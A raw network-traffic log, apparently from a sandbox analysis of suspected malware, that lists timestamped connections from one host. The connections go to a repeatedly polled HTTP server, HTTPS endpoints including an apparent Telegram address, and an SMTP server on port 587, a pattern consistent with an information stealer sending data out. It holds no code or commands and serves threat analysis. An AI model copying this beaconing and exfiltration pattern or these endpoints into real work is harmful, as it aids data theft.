                                                                                                                Jan 10, 2025 19:10:54.852963924 CET49772443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:54.853423119 CET49772443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:54.857994080 CET4976680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:54.859469891 CET4977880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:54.863112926 CET8049766193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.863182068 CET4976680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:54.864304066 CET8049778193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.864366055 CET4977880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:54.864471912 CET4977880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:54.869199991 CET8049778193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:56.503776073 CET8049778193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:56.504952908 CET49788443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:56.504978895 CET44349788104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:56.505129099 CET49788443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:56.505372047 CET49788443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:56.505382061 CET44349788104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:56.553601027 CET4977880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:56.965151072 CET44349788104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:56.986687899 CET49788443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:56.986711025 CET44349788104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.116595030 CET44349788104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.116652012 CET44349788104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.116745949 CET49788443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:57.117543936 CET49788443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:57.122025967 CET4977880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:57.122730017 CET4979580192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:57.127089024 CET8049778193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.127146006 CET4977880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:57.127598047 CET8049795193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.127686977 CET4979580192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:57.127774000 CET4979580192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:57.132599115 CET8049795193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.765115023 CET8049795193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.766530991 CET49801443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:57.766562939 CET44349801104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.766719103 CET49801443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:57.766989946 CET49801443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:57.767003059 CET44349801104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.819240093 CET4979580192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:58.248631001 CET44349801104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:58.259458065 CET49801443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:58.259476900 CET44349801104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:58.398586035 CET44349801104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:58.398684025 CET44349801104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:58.399017096 CET49801443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:58.400876999 CET49801443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:58.401928902 CET4979580192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:58.402966022 CET4980780192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:58.406922102 CET8049795193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:58.407074928 CET4979580192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:58.407805920 CET8049807193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:58.408020973 CET4980780192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:58.408020973 CET4980780192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:58.412920952 CET8049807193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.036676884 CET8049807193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.039196968 CET49808443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:59.039232016 CET44349808104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.039307117 CET49808443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:59.039752960 CET49808443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:59.039772034 CET44349808104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.080641031 CET4980780192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:59.493680000 CET44349808104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.500963926 CET49808443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:59.500981092 CET44349808104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.642411947 CET44349808104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.642481089 CET44349808104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.642520905 CET49808443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:59.642981052 CET49808443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:59.691555977 CET4980780192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:59.696887016 CET8049807193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.696959019 CET4980780192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:59.700210094 CET49814443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:10:59.700248003 CET44349814149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.700376034 CET49814443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:10:59.700850010 CET49814443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:10:59.700870037 CET44349814149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.332587957 CET44349814149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.332731962 CET49814443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:00.337186098 CET49814443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:00.337193012 CET44349814149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.337430954 CET44349814149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.339283943 CET49814443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:00.379324913 CET44349814149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.567138910 CET4982080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:00.572171926 CET8049820193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.572283030 CET4982080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:00.572510004 CET4982080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:00.577310085 CET8049820193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.597810984 CET44349814149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.597882032 CET44349814149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.597975016 CET49814443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:00.602914095 CET49814443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:01.197823048 CET8049820193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:01.202238083 CET4982080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:01.207194090 CET8049820193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:01.407902002 CET8049820193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:01.446121931 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:01.446166039 CET44349826104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:01.446583033 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:01.451173067 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:01.451196909 CET44349826104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:01.459976912 CET4982080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:01.908940077 CET44349826104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:01.909038067 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:01.910542965 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:01.910554886 CET44349826104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:01.910837889 CET44349826104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:01.959875107 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:01.966417074 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.007323027 CET44349826104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.074281931 CET44349826104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.074462891 CET44349826104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.074562073 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.077634096 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.080760956 CET4982080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:02.085613012 CET8049820193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.265723944 CET8049820193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.268007994 CET49833443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.268053055 CET44349833104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.268124104 CET49833443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.268423080 CET49833443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.268439054 CET44349833104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.319252014 CET4982080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:02.738698006 CET44349833104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.740797043 CET49833443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.740829945 CET44349833104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.891204119 CET44349833104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.891267061 CET44349833104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.891340971 CET49833443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.891874075 CET49833443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.895240068 CET4982080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:02.896651030 CET4983880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:02.900286913 CET8049820193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.900378942 CET4982080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:02.901544094 CET8049838193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.901632071 CET4983880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:02.901779890 CET4983880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:02.906558990 CET8049838193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:03.531225920 CET8049838193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:03.534493923 CET49844443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:03.534533024 CET44349844104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:03.534673929 CET49844443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:03.535337925 CET49844443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:03.535348892 CET44349844104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:03.584907055 CET4983880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:03.993501902 CET44349844104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:04.001327991 CET49844443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:04.001346111 CET44349844104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:04.124414921 CET44349844104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:04.124483109 CET44349844104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:04.124552011 CET49844443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:04.125149012 CET49844443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:04.130407095 CET4985080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:04.135247946 CET8049850193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:04.135327101 CET4985080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:04.135421038 CET4985080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:04.140237093 CET8049850193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:04.770710945 CET8049850193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:04.772052050 CET49853443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:04.772098064 CET44349853104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:04.772243023 CET49853443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:04.772659063 CET49853443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:04.772675037 CET44349853104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:04.819256067 CET4985080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:05.253787041 CET44349853104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:05.255522013 CET49853443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:05.255563021 CET44349853104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:05.411781073 CET44349853104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:05.411843061 CET44349853104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:05.412149906 CET49853443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:05.412488937 CET49853443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:05.416765928 CET4985080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:05.417942047 CET4985880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:05.421715975 CET8049850193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:05.421823978 CET4985080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:05.422791004 CET8049858193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:05.422878027 CET4985880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:05.423007011 CET4985880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:05.427757978 CET8049858193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:06.068742037 CET8049858193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:06.070452929 CET49864443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:06.070511103 CET44349864104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:06.070578098 CET49864443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:06.072776079 CET49864443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:06.072805882 CET44349864104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:06.081448078 CET4973680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:06.116126060 CET4985880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:06.526645899 CET44349864104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:06.528325081 CET49864443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:06.528378010 CET44349864104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:06.677373886 CET44349864104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:06.677443027 CET44349864104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:06.677791119 CET49864443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:06.678055048 CET49864443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:06.681461096 CET4985880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:06.682781935 CET4987080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:06.686628103 CET8049858193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:06.686691046 CET4985880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:06.687674999 CET8049870193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:06.687741995 CET4987080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:06.687894106 CET4987080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:06.692712069 CET8049870193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:06.846889973 CET49871587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:06.851773977 CET587498713.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:06.851846933 CET49871587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:07.314578056 CET8049870193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:07.323266029 CET49876443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:07.323333025 CET44349876104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:07.323417902 CET49876443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:07.323790073 CET49876443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:07.323807001 CET44349876104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:07.366123915 CET4987080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:07.367440939 CET587498713.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:07.367710114 CET49871587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:07.372545004 CET587498713.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:07.484662056 CET587498713.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:07.488297939 CET49871587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:07.493163109 CET587498713.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:07.605179071 CET587498713.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:07.605551004 CET49871587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:07.610455036 CET587498713.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:07.779444933 CET44349876104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:07.781245947 CET49876443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:07.781302929 CET44349876104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:07.926428080 CET44349876104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:07.926502943 CET44349876104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:07.926788092 CET49876443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:07.927154064 CET49876443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:07.932034969 CET4987080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:07.933500051 CET4988280192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:07.937333107 CET8049870193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:07.937560081 CET4987080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:07.938349962 CET8049882193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:07.938452959 CET4988280192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:07.938612938 CET4988280192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:07.943463087 CET8049882193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:08.594248056 CET8049882193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:08.595876932 CET49885443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:08.595922947 CET44349885104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:08.596076012 CET49885443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:08.596556902 CET49885443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:08.596574068 CET44349885104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:08.647504091 CET4988280192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:09.077857018 CET44349885104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:09.080430984 CET49885443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:09.080451965 CET44349885104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:09.226223946 CET44349885104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:09.226285934 CET44349885104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:09.226694107 CET49885443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:09.226845980 CET49885443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:09.230262041 CET4988280192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:09.231564999 CET4989080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:09.235362053 CET8049882193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:09.235447884 CET4988280192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:09.236452103 CET8049890193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:09.236541986 CET4989080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:09.236655951 CET4989080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:09.241416931 CET8049890193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:09.883912086 CET8049890193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:09.885165930 CET49896443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:09.885206938 CET44349896104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:09.885271072 CET49896443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:09.885519028 CET49896443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:09.885529041 CET44349896104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:09.928612947 CET4989080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:10.358685970 CET44349896104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:10.360286951 CET49896443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:10.360318899 CET44349896104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:10.509161949 CET44349896104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:10.509234905 CET44349896104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:10.509354115 CET49896443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:10.509850979 CET49896443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:10.512722015 CET4989080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:10.513950109 CET4990280192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:10.517657042 CET8049890193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:10.517723083 CET4989080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:10.518748999 CET8049902193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:10.518807888 CET4990280192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:10.518908024 CET4990280192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:10.523637056 CET8049902193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.120903969 CET587498713.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.121153116 CET49871587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:11.126039982 CET587498713.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.147424936 CET8049902193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.148761034 CET49907443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:11.148806095 CET44349907104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.148880005 CET49907443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:11.149142027 CET49907443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:11.149156094 CET44349907104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.194266081 CET4990280192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:11.239209890 CET587498713.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.239459991 CET49871587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:11.244358063 CET587498713.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.357387066 CET587498713.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.391159058 CET49871587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:11.396223068 CET587498713.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.396353006 CET49871587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:11.632648945 CET44349907104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.634253025 CET49907443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:11.634264946 CET44349907104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.798314095 CET44349907104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.798387051 CET44349907104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.798437119 CET49907443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:11.799060106 CET49907443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:11.818640947 CET4990280192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:11.819009066 CET49913443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:11.819061995 CET44349913149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.819114923 CET49913443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:11.820097923 CET49913443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:11.820108891 CET44349913149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.823705912 CET8049902193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:11.823760986 CET4990280192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:12.442509890 CET44349913149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:12.442596912 CET49913443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:12.444207907 CET49913443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:12.444216013 CET44349913149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:12.444494963 CET44349913149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:12.446074963 CET49913443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:12.487322092 CET44349913149.154.167.220192.168.2.6
